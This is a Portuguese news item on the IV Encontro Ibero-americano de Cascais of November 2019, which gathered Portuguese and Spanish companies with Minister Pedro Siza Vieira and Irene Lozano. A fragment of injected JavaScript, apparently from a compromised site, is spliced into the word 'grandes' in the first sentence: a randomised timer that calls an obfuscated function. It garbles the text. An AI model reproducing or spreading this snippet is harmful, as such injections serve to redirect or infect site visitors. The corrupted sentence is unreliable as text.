Notícias

IV Encontro Ibero-americano de Cascais reuniu grandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andes empresas com Ministro da Economia e Secretária de Estado para Espanha Global.

O IPDAL – com o apoio do BBVA, da Sacyr-Somague, da Cuatrecasas, da Câmara Municipal de Cascais e da SDM –  voltou a reunir algumas das maiores empresas de Portugal e Espanha, para definir uma agenda de interesses comuns.

0C8A4723 - 02

A iniciativa, que decorreu no dia 25 Novembro 2019, contou com as participações especiais do antigo Ministro das Finanças de Portugal, Jorge Braga de Macedo, do antigo Ministro das Obras Públicas de Portugal, António Mendonça, e do antigo Ministro dos Negócios Estrangeiros do Peru, José Antonio García Belaunde – representante da CAF para a Europa, entre vários outros oradores.

O IPDAL apresentou um relatório sobre as relações económicas entre Portugal e Espanha, com os números mais atuais do comércio bilateral.

IV EIC 2019 02

O IV Encontro Ibero-americano de Cascais consistiu num almoço de trabalho, que teve como principal convidado o Ministro de Estado, da Economia e da Transição Digital – e número dois do Governo de Portugal – Pedro Siza Vieira, e numa sessão de debate durante toda a tarde, concluída pela Secretária de Estado para “España Global”, Irene Lozano.